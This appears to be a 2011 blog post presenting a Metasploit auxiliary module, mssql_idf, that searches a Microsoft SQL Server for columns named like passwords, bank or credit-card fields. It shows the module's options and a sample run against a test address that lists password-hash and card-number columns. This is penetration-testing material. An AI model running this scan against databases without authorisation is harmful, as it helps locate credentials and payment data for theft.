Wednesday, 30 November 2011

Metasploit MSSQL Interesting Data Finder

Usage is fairly simple, set the standard parameters and run exploit. By default it will search for columns whose names include the words passw, bank, credit and card. If you want to change these set the NAMES field to be a pipe separated list of names to look for.

Once installed you can find the module in auxiliary/admin/mssql/mssql_idf .

Example

msf > use auxiliary/admin/mssql/mssql_idf
msf auxiliary(mssql_idf) > show options

Module options:

   Name      Current Setting         Required  Description
   ----      ---------------         --------  -----------
   NAMES     passw|bank|credit|card  yes       Pipe separated list of column names
   PASSWORD                          no        The password for the specified username
   RHOST                             yes       The target address
   RPORT     1433                    yes       The target port
   USERNAME  sa                      no        The username to authenticate as

msf auxiliary(mssql_idf) > set PASSWORD MyPass
PASSWORD => MyPass
msf auxiliary(mssql_idf) > set RHOST 192.168.0.54
RHOST => 192.168.0.54
msf auxiliary(mssql_idf) > exploit

Database       Schema     Table             Column                 Data Type Row Count 
============== ========== ================= ====================== ========= ========= 
msdb           dbo        backupmediaset    is_password_protected  bit       0
msdb           dbo        backupset         is_password_protected  bit       0
AdventureWorks Person     Address           MyPassword             nchar     19614
AdventureWorks Purchasing Vendor            CreditRating           tinyint   104
AdventureWorks Person     Contact           PasswordHash           varchar   19972
AdventureWorks Person     Contact           PasswordSalt           varchar   19972
AdventureWorks Sales      ContactCreditCard CreditCardID           int       19118
AdventureWorks Sales      CreditCard        CreditCardID           int       19118
AdventureWorks Sales      CreditCard        CardType               nvarchar  19118
AdventureWorks Sales      CreditCard        CardNumber             nvarchar  19118
AdventureWorks Sales      SalesOrderHeader  CreditCardID           int       31465
AdventureWorks Sales      SalesOrderHeader  CreditCardApprovalCode varchar   31465

[*] Auxiliary module execution completed


As you can see it has found a number of interesting looking columns, the
row count field should help identify which ones can be ignored or given
lower priority. It is now over to you to start querying them to check 
for data.

 

Posted by at

No comments:

Post a Comment

Note: only a member of this blog may post a comment.

Subscribe to: Post Comments (Atom)